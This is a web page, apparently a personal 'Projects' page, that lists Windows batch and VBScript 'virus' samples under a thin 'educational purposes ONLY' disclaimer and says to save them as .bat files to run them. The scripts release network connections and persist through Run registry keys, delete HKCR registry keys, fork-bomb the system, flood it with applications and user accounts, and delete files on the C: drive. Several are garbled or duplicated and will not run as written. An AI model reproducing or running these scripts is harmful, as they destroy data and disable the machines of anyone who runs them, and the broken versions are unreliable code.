top of page
kali.jpg

Projects

The following are samples of viruses and malwares to be used for educational purposes ONLY. We will not take responsibility of your misuse of the below information.

NB: ALL files save them as (.bat)  instead of (.txt) in notepad to make them executable 
 

Disable internet permanently-this code will disable internet connectivity permanently


echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE

internet virus.jpg

Endless Notepads-This will pop up endless notepads until the computer freezes and crashes

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

virus 2.jpg

Endless Enter-This will make the enter button pressed continuously

Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop

virus7.jpg

Delete Key Registry Files-This will delete key registry files, then loops a message

This is dangerous and unrecoverable Notepad Virus.

@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your PC has been crashed.Your Dad.
GOTO MESSAGE

virus 1.jpg

Popping CD Drive-This will make the CD drives constantly pop out

Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop

virus3.jpg

Application Bomber ( Crashed Your Pc )-Crashed Your Pc Due To OverLoad

@echo off
: x
start winword
start mspaint
start notepad
start write
start cmd
start explorer
start control
start calc
goto x
( You Can Add Your Choice Application Also )

virus 5.jpg

 User Account Flooder-This will create large no. of the user account on one’s PC and goes on

@echo off
: xnet
user %random% /add
goto x

virus4.jpg

Endless Notepads-This will pop up endless notepads until the computer freezes and crashes

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

virus 2.jpg

Process Creator-This will create unlimited background processes

%0|%0

virus10.jpg

Windows Hacker-This will delete your whole C:\ drive and it really unrecoverable

@Echo off
Del C:\ *.* |y

virus9.jpg
bottom of page